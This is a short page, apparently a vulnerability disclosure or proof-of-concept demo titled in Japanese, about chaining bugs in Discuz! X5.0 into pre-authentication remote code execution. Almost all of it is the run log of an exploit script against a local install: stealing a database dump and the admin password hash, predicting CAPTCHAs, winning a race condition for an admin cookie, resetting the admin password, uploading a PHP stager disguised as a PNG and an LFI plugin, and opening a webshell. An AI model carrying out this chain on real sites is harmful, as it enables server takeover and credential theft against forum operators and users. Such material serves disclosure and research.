
Discuz! X5.0 におけるセキュリティバグの連鎖: 競合状態から Pre-Auth RCE へ
pip3 install Pillow torch torchvision
$ python3 exploit.py http://localhost/discuz5/
+----------------------------------------------------+
| Discuz! X5.0 Remote Code Execution Exploit by EgiX |
+----------------------------------------------------+
[+] DBエクスポート用のauthcodeを取得中
[+] Authcode: 61feiuI8ReSHRHUDKl2DXeB1QMcdNX6Mpu0gZ8OBS5qRgmQ6Jg3W6mrNVooNqITEtQOd4WUMlGNlQSz7WD6s
[+] DBをエクスポート中
[+] DBダンプをダウンロード中
[+] 管理者のユーザー名とMD5パスワードハッシュを検索中
[+] 管理者ユーザー名: admin
[+] 管理者MD5パスワード: 96b21b6bfc5fe6d4530f8345fbcfbc6d
[+] 新しい'special'ユーザーを登録中
[+] ユーザー名: 96b21b6bfc5fe6d4530f8345fbcfbc6d 1 c55a895b
[+] CAPTCHAが有効です
[+] CAPTCHAをダウンロード中
[+] CAPTCHA予測: CY46
[+] DBインポート用のauthcodeを取得中
[+] Authcode: 553fh4gPsIhwsSdSKb1ti6SqITi945W2I%2BEyoYCMwVQeMqfyp4ekIwTPqzKkU7hfTHqVg0FhhR9Ic3kiUkkGVsbzkDOIcRpL7bCHUKRKha6KxPeOoud0qxEZPqk
[+] CAPTCHAが有効です
[+] CAPTCHAをダウンロード中
[+] CAPTCHA予測: CMJ6
[+] 競合状態攻撃を実行中
[+] 🏆 競合状態攻撃成功!
[+] 管理者認証クッキー: ef196PBDlZZvpe3Fze5ZW36x3%2B7i9cukujemIqJ%2BH1vGJCBmVWLlNVa2OCnq2lAsLjFhrC5x55Wgh3mlqgSnlwXKRqvhQbDaZguSq5hboelr
[+] インポートプロセスが完了するのを待機中
[+] 管理者パスワードをリセット中
[+] admincpにログイン中
[+] adminとして:PHPステージャーをPNG画像としてアップロード中
[+] adminとして:偽のプラグインをインポート中
[+] adminとして:ローカルファイルインクルージョン(LFI)プラグインをインポート中
[+] adminとして:PHPステージャーLFIをトリガー中
[+] Webshellを起動中
discuz-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
discuz-shell# pwd
/var/www/html/discuz5
discuz-shell# exit